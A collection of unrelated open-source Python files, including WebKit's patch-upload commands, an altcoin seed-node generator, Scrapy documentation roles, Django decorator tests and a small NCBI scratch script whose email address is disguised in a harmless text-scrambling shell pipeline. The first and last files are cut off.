comments = FileCommentRelationshipField(related_view='registrations:registration-comments',
related_view_kwargs={'node_id': '<node._id>'},
related_meta={'unread': 'get_unread_comments_count'},
filter={'target': 'get_file_guid'})
class RegistrationProviderSerializer(NodeProviderSerializer):
"""
Overrides NodeProviderSerializer to produce correct registration file links
"""
files = NodeFileHyperLinkField(
related_view='registrations:registration-files',
related_view_kwargs={'node_id': '<node_id>', 'path': '<path>', 'provider': '<provider>'},
kind='folder',
never_embed=True
)
|
eda-globetrotter/Calabria-Digital-Bio
|
refs/heads/master
|
reads-dna-seq/try_concepts.py
|
1
|
#!/usr/bin/python
"""
This Python script is written by Zhiyang Ong to try
different concepts in Python.
Synopsis:
Try different concepts in Python.
This script can be executed as follows:
./try_concepts.py [input arguments as necessary]
Parameters:
[input arguments]: ???
"""
# The MIT License (MIT)
# Copyright (c) <2014> <Zhiyang Ong>
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Email address: echo "cukj -wb- 23wU4X5M589 TROJANS cqkH wiuz2y 0f Mw Stanford" | awk '{ sub("23wU4X5M589","F.d_c_b. ") sub("Stanford","d0mA1n"); print $5, $2, $8; for (i=1; i<=1; i++) print "6\b"; print $9, $7, $6 }' | sed y/kqcbuHwM62z/gnotrzadqmC/ | tr 'q' ' ' | tr -d [:cntrl:] | tr -d 'ir' | tr y "\n" What does it mean?
###############################################################
# Import modules from The Python Standard Library.
import sys
###############################################################
# Module with methods that builds the sequence database.
class Build_Seq_DB:
# ============================================================
# Method to provide information on how to run this script.
@staticmethod
def how_to_use_script():
print "================================================="
print "==> This script builds an Org-mode database for"
print " SRA sequence reads in the NCBI database."
print
print "Required input arguments:"
print "1) Org-mode database"
print "2) URL to NCBI search results."
print
print "This script can be executed as follows:"
print "./build_sra_seq_db.py [Org-mode file] [input URL]"
print
print "================================================="
exit(1)
# Make this method a static method.
#how2use_script = staticmethod(how_to_use_script())
# ============================================================
# Preconditions.
@staticmethod
def preprocessing():
print 'Enter preprocessing method.'
"""
Are two input arguments provided to the execution of this
script?
"sys.argv" includes the name of the Python script as an
input argument to Python.
Hence, a Python script that was given 2 input arguments
would have 3 entries in "sys.argv".
Therefore, check if number of elements in "sys.argv" < 3.
"""
if len(sys.argv) < 3:
print 'Number of arguments:', len(sys.argv), 'arguments.'
print "Store search results in:::", sys.argv
Build_Seq_DB.how_to_use_script()
else:
print "how2use_script()"
# Is the path to the Org-mode database file provided?
print '#arguments:', len(sys.argv), 'arguments.'
#print "Store search results in:::", sys.argv[1]
# Make this method a static method.
#preprocessing = staticmethod(static_preprocessing())
# ============================================================
# Method to process online search results.
@staticmethod
def process_search_results():
print "==> Start collecting SRA reads about search key."
# For each search result from the NCBI database.
# Get its index.
# Get its accession number.
# Get its URL.
# Go to its web page.
# Get its publication date.
# Get its FTP link.
# Get submitter's organization.
# ============================================================
# Method to dump information into the Org-mode database.
@staticmethod
def dump_to_org_db():
print "==> Start dumping SRA read information into the Org-mode database."
print "Ciao Mondo!!!"
Build_Seq_DB.preprocessing()
print "What's up"
|
jazkarta/edx-platform
|
refs/heads/master
|
lms/djangoapps/commerce/urls.py
|
57
|
"""
Defines the URL routes for this app.
"""
from django.conf.urls import patterns, url
from commerce import views
urlpatterns = patterns(
'',
url(r'^checkout/cancel/$', views.checkout_cancel, name='checkout_cancel'),
url(r'^checkout/receipt/$', views.checkout_receipt, name='checkout_receipt'),
)
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/mobile/shared_dressed_binayre_goon_bith_female_01.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_binayre_goon_bith_female_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","bith_base_female")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
pigshell/nhnick
|
refs/heads/vnc-websocket
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/upload.py
|
121
|
# Copyright (c) 2009, 2010 Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import re
import sys
from optparse import make_option
from webkitpy.tool import steps
from webkitpy.common.checkout.changelog import parse_bug_id_from_changelog
from webkitpy.common.config.committers import CommitterList
from webkitpy.common.system.user import User
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.commands.abstractsequencedcommand import AbstractSequencedCommand
from webkitpy.tool.comments import bug_comment_from_svn_revision
from webkitpy.tool.grammar import pluralize, join_with_separators
from webkitpy.tool.multicommandtool import Command
_log = logging.getLogger(__name__)
class CommitMessageForCurrentDiff(Command):
name = "commit-message"
help_text = "Print a commit message suitable for the uncommitted changes"
def __init__(self):
options = [
steps.Options.git_commit,
]
Command.__init__(self, options=options)
def execute(self, options, args, tool):
# This command is a useful test to make sure commit_message_for_this_commit
# always returns the right value regardless of the current working directory.
print "%s" % tool.checkout().commit_message_for_this_commit(options.git_commit).message()
class CleanPendingCommit(Command):
name = "clean-pending-commit"
help_text = "Clear r+ on obsolete patches so they do not appear in the pending-commit list."
# NOTE: This was designed to be generic, but right now we're only processing patches from the pending-commit list, so only r+ matters.
def _flags_to_clear_on_patch(self, patch):
if not patch.is_obsolete():
return None
what_was_cleared = []
if patch.review() == "+":
if patch.reviewer():
what_was_cleared.append(u"%s's review+" % patch.reviewer().full_name)
else:
what_was_cleared.append("review+")
return join_with_separators(what_was_cleared)
def execute(self, options, args, tool):
committers = CommitterList()
for bug_id in tool.bugs.queries.fetch_bug_ids_from_pending_commit_list():
bug = self._tool.bugs.fetch_bug(bug_id)
patches = bug.patches(include_obsolete=True)
for patch in patches:
flags_to_clear = self._flags_to_clear_on_patch(patch)
if not flags_to_clear:
continue
message = u"Cleared %s from obsolete attachment %s so that this bug does not appear in http://webkit.org/pending-commit." % (flags_to_clear, patch.id())
self._tool.bugs.obsolete_attachment(patch.id(), message)
# FIXME: This should share more logic with AssignToCommitter and CleanPendingCommit
class CleanReviewQueue(Command):
name = "clean-review-queue"
help_text = "Clear r? on obsolete patches so they do not appear in the pending-review list."
def execute(self, options, args, tool):
queue_url = "http://webkit.org/pending-review"
# We do this inefficient dance to be more like webkit.org/pending-review
# bugs.queries.fetch_bug_ids_from_review_queue() doesn't return
# closed bugs, but folks using /pending-review will see them. :(
for patch_id in tool.bugs.queries.fetch_attachment_ids_from_review_queue():
patch = self._tool.bugs.fetch_attachment(patch_id)
if not patch.review() == "?":
continue
attachment_obsolete_modifier = ""
bug_closed_explanation = ""
if patch.is_obsolete():
attachment_obsolete_modifier = "obsolete "
elif patch.bug().is_closed():
bug_closed_explanation = " If you would like this patch reviewed, please attach it to a new bug (or re-open this bug before marking it for review again)."
else:
# Neither the patch was obsolete nor the bug closed, so move on to the next patch...
continue
message = "Cleared review? from %sattachment %s so that this bug does not appear in %s.%s" % (attachment_obsolete_modifier, patch.id(), queue_url, bug_closed_explanation)
self._tool.bugs.obsolete_attachment(patch.id(), message)
class AssignToCommitter(Command):
name = "assign-to-committer"
help_text = "Assign bug to whoever attached the most recent r+'d patch"
def _patches_have_committers(self, reviewed_patches):
for patch in reviewed_patches:
if not patch.committer():
return False
return True
def _assign_bug_to_last_patch_attacher(self, bug_id):
committers = CommitterList()
bug = self._tool.bugs.fetch_bug(bug_id)
if not bug.is_unassigned():
assigned_to_email = bug.assigned_to_email()
_log.info(u"Bug %s is already assigned to %s (%s)." % (bug_id, assigned_to_email, committers.committer_by_email(assigned_to_email)))
return
reviewed_patches = bug.reviewed_patches()
if not reviewed_patches:
_log.info("Bug %s has no non-obsolete patches, ignoring." % bug_id)
return
# We only need to do anything with this bug if one of the r+'d patches does not have a valid committer (cq+ set).
if self._patches_have_committers(reviewed_patches):
_log.info("All reviewed patches on bug %s already have commit-queue+, ignoring." % bug_id)
return
latest_patch = reviewed_patches[-1]
attacher_email = latest_patch.attacher_email()
committer = committers.committer_by_email(attacher_email)
if not committer:
_log.info("Attacher %s is not a committer. Bug %s likely needs commit-queue+." % (attacher_email, bug_id))
return
reassign_message = u"Attachment %s was posted by a committer and has review+, assigning to %s for commit." % (latest_patch.id(), committer.full_name)
self._tool.bugs.reassign_bug(bug_id, committer.bugzilla_email(), reassign_message)
def execute(self, options, args, tool):
for bug_id in tool.bugs.queries.fetch_bug_ids_from_pending_commit_list():
self._assign_bug_to_last_patch_attacher(bug_id)
class ObsoleteAttachments(AbstractSequencedCommand):
name = "obsolete-attachments"
help_text = "Mark all attachments on a bug as obsolete"
argument_names = "BUGID"
steps = [
steps.ObsoletePatches,
]
def _prepare_state(self, options, args, tool):
return { "bug_id" : args[0] }
class AttachToBug(AbstractSequencedCommand):
name = "attach-to-bug"
help_text = "Attach the the file to the bug"
argument_names = "BUGID FILEPATH"
steps = [
steps.AttachToBug,
]
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = args[0]
state["filepath"] = args[1]
return state
class AbstractPatchUploadingCommand(AbstractSequencedCommand):
def _bug_id(self, options, args, tool, state):
# Prefer a bug id passed as an argument over a bug url in the diff (i.e. ChangeLogs).
bug_id = args and args[0]
if not bug_id:
changed_files = self._tool.scm().changed_files(options.git_commit)
state["changed_files"] = changed_files
bug_id = tool.checkout().bug_id_for_this_commit(options.git_commit, changed_files)
return bug_id
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = self._bug_id(options, args, tool, state)
if not state["bug_id"]:
_log.error("No bug id passed and no bug url found in ChangeLogs.")
sys.exit(1)
return state
class Post(AbstractPatchUploadingCommand):
name = "post"
help_text = "Attach the current working directory diff to a bug as a patch file"
argument_names = "[BUGID]"
steps = [
steps.ValidateChangeLogs,
steps.CheckStyle,
steps.ConfirmDiff,
steps.ObsoletePatches,
steps.SuggestReviewers,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiff,
]
class LandSafely(AbstractPatchUploadingCommand):
name = "land-safely"
help_text = "Land the current diff via the commit-queue"
argument_names = "[BUGID]"
long_help = """land-safely updates the ChangeLog with the reviewer listed
in bugs.webkit.org for BUGID (or the bug ID detected from the ChangeLog).
The command then uploads the current diff to the bug and marks it for
commit by the commit-queue."""
show_in_main_help = True
steps = [
steps.UpdateChangeLogsWithReviewer,
steps.ValidateChangeLogs,
steps.ObsoletePatches,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiffForCommit,
]
class HasLanded(AbstractPatchUploadingCommand):
name = "has-landed"
help_text = "Check that the current code was successfully landed and no changes remain."
argument_names = "[BUGID]"
steps = [
steps.HasLanded,
]
class Prepare(AbstractSequencedCommand):
name = "prepare"
help_text = "Creates a bug (or prompts for an existing bug) and prepares the ChangeLogs"
argument_names = "[BUGID]"
steps = [
steps.PromptForBugOrTitle,
steps.CreateBug,
steps.PrepareChangeLog,
]
def _prepare_state(self, options, args, tool):
bug_id = args and args[0]
return { "bug_id" : bug_id }
class Upload(AbstractPatchUploadingCommand):
name = "upload"
help_text = "Automates the process of uploading a patch for review"
argument_names = "[BUGID]"
show_in_main_help = True
steps = [
steps.ValidateChangeLogs,
steps.CheckStyle,
steps.PromptForBugOrTitle,
steps.CreateBug,
steps.PrepareChangeLog,
steps.EditChangeLog,
steps.ConfirmDiff,
steps.ObsoletePatches,
steps.SuggestReviewers,
steps.EnsureBugIsOpenAndAssigned,
steps.PostDiff,
]
long_help = """upload uploads the current diff to bugs.webkit.org.
If no bug id is provided, upload will create a bug.
If the current diff does not have a ChangeLog, upload
will prepare a ChangeLog. Once a patch is ready, upload
will open the ChangeLogs for editing using the command in the
EDITOR environment variable and will display the diff using the
command in the PAGER environment variable."""
def _prepare_state(self, options, args, tool):
state = {}
state["bug_id"] = self._bug_id(options, args, tool, state)
return state
class EditChangeLogs(AbstractSequencedCommand):
name = "edit-changelogs"
help_text = "Opens modified ChangeLogs in $EDITOR"
show_in_main_help = True
steps = [
steps.EditChangeLog,
]
class PostCommits(Command):
name = "post-commits"
help_text = "Attach a range of local commits to bugs as patch files"
argument_names = "COMMITISH"
def __init__(self):
options = [
make_option("-b", "--bug-id", action="store", type="string", dest="bug_id", help="Specify bug id if no URL is provided in the commit log."),
make_option("--add-log-as-comment", action="store_true", dest="add_log_as_comment", default=False, help="Add commit log message as a comment when uploading the patch."),
make_option("-m", "--description", action="store", type="string", dest="description", help="Description string for the attachment (default: description from commit message)"),
steps.Options.obsolete_patches,
steps.Options.review,
steps.Options.request_commit,
]
Command.__init__(self, options=options, requires_local_commits=True)
def _comment_text_for_commit(self, options, commit_message, tool, commit_id):
comment_text = None
if (options.add_log_as_comment):
comment_text = commit_message.body(lstrip=True)
comment_text += "---\n"
comment_text += tool.scm().files_changed_summary_for_commit(commit_id)
return comment_text
def execute(self, options, args, tool):
commit_ids = tool.scm().commit_ids_from_commitish_arguments(args)
if len(commit_ids) > 10: # We could lower this limit, 10 is too many for one bug as-is.
_log.error("webkit-patch does not support attaching %s at once. Are you sure you passed the right commit range?" % (pluralize("patch", len(commit_ids))))
sys.exit(1)
have_obsoleted_patches = set()
for commit_id in commit_ids:
commit_message = tool.scm().commit_message_for_local_commit(commit_id)
# Prefer --bug-id=, then a bug url in the commit message, then a bug url in the entire commit diff (i.e. ChangeLogs).
bug_id = options.bug_id or parse_bug_id_from_changelog(commit_message.message()) or parse_bug_id_from_changelog(tool.scm().create_patch(git_commit=commit_id))
if not bug_id:
_log.info("Skipping %s: No bug id found in commit or specified with --bug-id." % commit_id)
continue
if options.obsolete_patches and bug_id not in have_obsoleted_patches:
state = { "bug_id": bug_id }
steps.ObsoletePatches(tool, options).run(state)
have_obsoleted_patches.add(bug_id)
diff = tool.scm().create_patch(git_commit=commit_id)
description = options.description or commit_message.description(lstrip=True, strip_url=True)
comment_text = self._comment_text_for_commit(options, commit_message, tool, commit_id)
tool.bugs.add_patch_to_bug(bug_id, diff, description, comment_text, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
# FIXME: This command needs to be brought into the modern age with steps and CommitInfo.
class MarkBugFixed(Command):
name = "mark-bug-fixed"
help_text = "Mark the specified bug as fixed"
argument_names = "[SVN_REVISION]"
def __init__(self):
options = [
make_option("--bug-id", action="store", type="string", dest="bug_id", help="Specify bug id if no URL is provided in the commit log."),
make_option("--comment", action="store", type="string", dest="comment", help="Text to include in bug comment."),
make_option("--open", action="store_true", default=False, dest="open_bug", help="Open bug in default web browser (Mac only)."),
make_option("--update-only", action="store_true", default=False, dest="update_only", help="Add comment to the bug, but do not close it."),
]
Command.__init__(self, options=options)
# FIXME: We should be using checkout().changelog_entries_for_revision(...) instead here.
def _fetch_commit_log(self, tool, svn_revision):
if not svn_revision:
return tool.scm().last_svn_commit_log()
return tool.scm().svn_commit_log(svn_revision)
def _determine_bug_id_and_svn_revision(self, tool, bug_id, svn_revision):
commit_log = self._fetch_commit_log(tool, svn_revision)
if not bug_id:
bug_id = parse_bug_id_from_changelog(commit_log)
if not svn_revision:
match = re.search("^r(?P<svn_revision>\d+) \|", commit_log, re.MULTILINE)
if match:
svn_revision = match.group('svn_revision')
if not bug_id or not svn_revision:
not_found = []
if not bug_id:
not_found.append("bug id")
if not svn_revision:
not_found.append("svn revision")
_log.error("Could not find %s on command-line or in %s."
% (" or ".join(not_found), "r%s" % svn_revision if svn_revision else "last commit"))
sys.exit(1)
return (bug_id, svn_revision)
def execute(self, options, args, tool):
bug_id = options.bug_id
svn_revision = args and args[0]
if svn_revision:
if re.match("^r[0-9]+$", svn_revision, re.IGNORECASE):
svn_revision = svn_revision[1:]
if not re.match("^[0-9]+$", svn_revision):
_log.error("Invalid svn revision: '%s'" % svn_revision)
sys.exit(1)
needs_prompt = False
if not bug_id or not svn_revision:
needs_prompt = True
(bug_id, svn_revision) = self._determine_bug_id_and_svn_revision(tool, bug_id, svn_revision)
_log.info("Bug: <%s> %s" % (tool.bugs.bug_url_for_bug_id(bug_id), tool.bugs.fetch_bug_dictionary(bug_id)["title"]))
_log.info("Revision: %s" % svn_revision)
if options.open_bug:
tool.user.open_url(tool.bugs.bug_url_for_bug_id(bug_id))
if needs_prompt:
if not tool.user.confirm("Is this correct?"):
self._exit(1)
bug_comment = bug_comment_from_svn_revision(svn_revision)
if options.comment:
bug_comment = "%s\n\n%s" % (options.comment, bug_comment)
if options.update_only:
_log.info("Adding comment to Bug %s." % bug_id)
tool.bugs.post_comment_to_bug(bug_id, bug_comment)
else:
_log.info("Adding comment to Bug %s and marking as Resolved/Fixed." % bug_id)
tool.bugs.close_bug_as_fixed(bug_id, bug_comment)
# FIXME: Requires unit test. Blocking issue: too complex for now.
class CreateBug(Command):
name = "create-bug"
help_text = "Create a bug from local changes or local commits"
argument_names = "[COMMITISH]"
def __init__(self):
options = [
steps.Options.cc,
steps.Options.component,
make_option("--no-prompt", action="store_false", dest="prompt", default=True, help="Do not prompt for bug title and comment; use commit log instead."),
make_option("--no-review", action="store_false", dest="review", default=True, help="Do not mark the patch for review."),
make_option("--request-commit", action="store_true", dest="request_commit", default=False, help="Mark the patch as needing auto-commit after review."),
]
Command.__init__(self, options=options)
def create_bug_from_commit(self, options, args, tool):
commit_ids = tool.scm().commit_ids_from_commitish_arguments(args)
if len(commit_ids) > 3:
_log.error("Are you sure you want to create one bug with %s patches?" % len(commit_ids))
sys.exit(1)
commit_id = commit_ids[0]
bug_title = ""
comment_text = ""
if options.prompt:
(bug_title, comment_text) = self.prompt_for_bug_title_and_comment()
else:
commit_message = tool.scm().commit_message_for_local_commit(commit_id)
bug_title = commit_message.description(lstrip=True, strip_url=True)
comment_text = commit_message.body(lstrip=True)
comment_text += "---\n"
comment_text += tool.scm().files_changed_summary_for_commit(commit_id)
diff = tool.scm().create_patch(git_commit=commit_id)
bug_id = tool.bugs.create_bug(bug_title, comment_text, options.component, diff, "Patch", cc=options.cc, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
if bug_id and len(commit_ids) > 1:
options.bug_id = bug_id
options.obsolete_patches = False
# FIXME: We should pass through --no-comment switch as well.
PostCommits.execute(self, options, commit_ids[1:], tool)
def create_bug_from_patch(self, options, args, tool):
bug_title = ""
comment_text = ""
if options.prompt:
(bug_title, comment_text) = self.prompt_for_bug_title_and_comment()
else:
commit_message = tool.checkout().commit_message_for_this_commit(options.git_commit)
bug_title = commit_message.description(lstrip=True, strip_url=True)
comment_text = commit_message.body(lstrip=True)
diff = tool.scm().create_patch(options.git_commit)
bug_id = tool.bugs.create_bug(bug_title, comment_text, options.component, diff, "Patch", cc=options.cc, mark_for_review=options.review, mark_for_commit_queue=options.request_commit)
def prompt_for_bug_title_and_comment(self):
bug_title = User.prompt("Bug title: ")
# FIXME: User should provide a function for doing this multi-line prompt.
print "Bug comment (hit ^D on blank line to end):"
lines = sys.stdin.readlines()
try:
sys.stdin.seek(0, os.SEEK_END)
except IOError:
# Cygwin raises an Illegal Seek (errno 29) exception when the above
# seek() call is made. Ignoring it seems to cause no harm.
# FIXME: Figure out a way to avoid the exception in the first
# place.
pass
comment_text = "".join(lines)
return (bug_title, comment_text)
def execute(self, options, args, tool):
if len(args):
if (not tool.scm().supports_local_commits()):
_log.error("Extra arguments not supported; patch is taken from working directory.")
sys.exit(1)
self.create_bug_from_commit(options, args, tool)
else:
self.create_bug_from_patch(options, args, tool)
|
antcheck/antcoin
|
refs/heads/master
|
share/seeds/generate-seeds.py
|
1
|
#!/usr/bin/python
# Copyright (c) 2014 Wladmir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
from __future__ import print_function, division
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % addr)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
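# Illustrative mappings (hypothetical inputs, not from the original script):
#   name_to_ipv6('1.2.3.4')    -> pchIPv4 + bytearray([1, 2, 3, 4])
#   name_to_ipv6('::1')        -> fifteen null bytes followed by 0x01
#   name_to_ipv6('0x0100007f') -> pchIPv4 + bytearray([0x7f, 0x00, 0x00, 0x01]), i.e. 127.0.0.1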
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
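# Illustrative behaviour (hypothetical inputs):
#   parse_spec('1.2.3.4:8555', 17771) -> (16-byte address, 8555)
#   parse_spec('[::1]', 17771)        -> (16-byte address, 17771), falling back to the default port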
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
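# For illustration, a hypothetical input line "1.2.3.4:17771" would emit:
#   {{0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0x01,0x02,0x03,0x04}, 17771}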
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef BITCOIN_CHAINPARAMSSEEDS_H\n')
g.write('#define BITCOIN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the antcoin network\n')
g.write(' * AUTOGENERATED by share/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside an IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_main', 17771)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'),'r') as f:
process_nodes(g, f, 'pnSeed6_test', 17772)
g.write('#endif // BITCOIN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
|
mouadino/scrapy
|
refs/heads/master
|
docs/_ext/scrapydocs.py
|
2
|
from docutils.parsers.rst.roles import set_classes
from docutils import nodes
def setup(app):
app.add_crossref_type(
directivename = "setting",
rolename = "setting",
indextemplate = "pair: %s; setting",
)
app.add_crossref_type(
directivename = "signal",
rolename = "signal",
indextemplate = "pair: %s; signal",
)
app.add_crossref_type(
directivename = "command",
rolename = "command",
indextemplate = "pair: %s; command",
)
app.add_crossref_type(
directivename = "reqmeta",
rolename = "reqmeta",
indextemplate = "pair: %s; reqmeta",
)
app.add_role('source', source_role)
app.add_role('commit', commit_role)
app.add_role('rev', rev_role)
def source_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'https://github.com/scrapy/scrapy/blob/master/' + text
set_classes(options)
node = nodes.reference(rawtext, text, refuri=ref, **options)
return [node], []
def commit_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'https://github.com/scrapy/scrapy/commit/' + text
set_classes(options)
node = nodes.reference(rawtext, 'commit ' + text, refuri=ref, **options)
return [node], []
def rev_role(name, rawtext, text, lineno, inliner, options={}, content=[]):
ref = 'http://hg.scrapy.org/scrapy/changeset/' + text
set_classes(options)
node = nodes.reference(rawtext, 'r' + text, refuri=ref, **options)
return [node], []
|
mixman/djangodev
|
refs/heads/master
|
tests/regressiontests/decorators/tests.py
|
1
|
import warnings
from functools import wraps
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import login_required, permission_required, user_passes_test
from django.http import HttpResponse, HttpRequest, HttpResponseNotAllowed
from django.middleware.clickjacking import XFrameOptionsMiddleware
from django.test.utils import get_warnings_state, restore_warnings_state
from django.utils.decorators import method_decorator
from django.utils.functional import allow_lazy, lazy, memoize
from django.utils.unittest import TestCase
from django.views.decorators.cache import cache_page, never_cache, cache_control
from django.views.decorators.clickjacking import xframe_options_deny, xframe_options_sameorigin, xframe_options_exempt
from django.views.decorators.http import require_http_methods, require_GET, require_POST, require_safe
from django.views.decorators.vary import vary_on_headers, vary_on_cookie
def fully_decorated(request):
"""Expected __doc__"""
return HttpResponse('<html><body>dummy</body></html>')
fully_decorated.anything = "Expected __dict__"
def compose(*functions):
# compose(f, g)(*args, **kwargs) == f(g(*args, **kwargs))
functions = list(reversed(functions))
def _inner(*args, **kwargs):
result = functions[0](*args, **kwargs)
for f in functions[1:]:
result = f(result)
return result
return _inner
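# Illustrative check (not part of the original tests):
#   compose(len, str.strip)(' abc ') == 3, i.e. str.strip runs first,
#   matching len(str.strip(' abc ')).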
full_decorator = compose(
# django.views.decorators.http
require_http_methods(["GET"]),
require_GET,
require_POST,
require_safe,
# django.views.decorators.vary
vary_on_headers('Accept-language'),
vary_on_cookie,
# django.views.decorators.cache
cache_page(60*15),
cache_control(private=True),
never_cache,
# django.contrib.auth.decorators
# Apply user_passes_test twice to check #9474
user_passes_test(lambda u:True),
login_required,
permission_required('change_world'),
# django.contrib.admin.views.decorators
staff_member_required,
# django.utils.functional
lambda f: memoize(f, {}, 1),
allow_lazy,
lazy,
)
fully_decorated = full_decorator(fully_decorated)
class DecoratorsTest(TestCase):
def setUp(self):
self.warning_state = get_warnings_state()
warnings.filterwarnings('ignore', category=PendingDeprecationWarning,
module='django.views.decorators.cache')
def tearDown(self):
restore_warnings_state(self.warning_state)
def test_attributes(self):
"""
Tests that django decorators set certain attributes of the wrapped
function.
"""
self.assertEqual(fully_decorated.__name__, 'fully_decorated')
self.assertEqual(fully_decorated.__doc__, 'Expected __doc__')
